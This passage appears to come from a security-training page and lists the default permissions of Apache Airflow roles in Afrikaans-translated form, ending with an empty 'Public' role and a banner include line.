\[kan lees op DAGs, kan lees op DAG Runs, kan lees op Task Instances, kan lees op Audit Logs, kan lees op ImportError, kan lees op XComs, kan lees op DAG Code, kan lees op Plugins, kan lees op DAG Dependencies, kan lees op Jobs, kan lees op My Password, kan wysig op My Password, kan lees op My Profile, kan wysig op My Profile, kan lees op SLA Misses, kan lees op Task Logs, kan lees op Website, menu toegang op Browse, menu toegang op DAG Dependencies, menu toegang op DAG Runs, menu toegang op Documentation, menu toegang op Docs, menu toegang op Jobs, menu toegang op Audit Logs, menu toegang op Plugins, menu toegang op SLA Misses, menu toegang op Task Instances]
- **Public**
\[]
{{#include ../../banners/hacktricks-training.md}}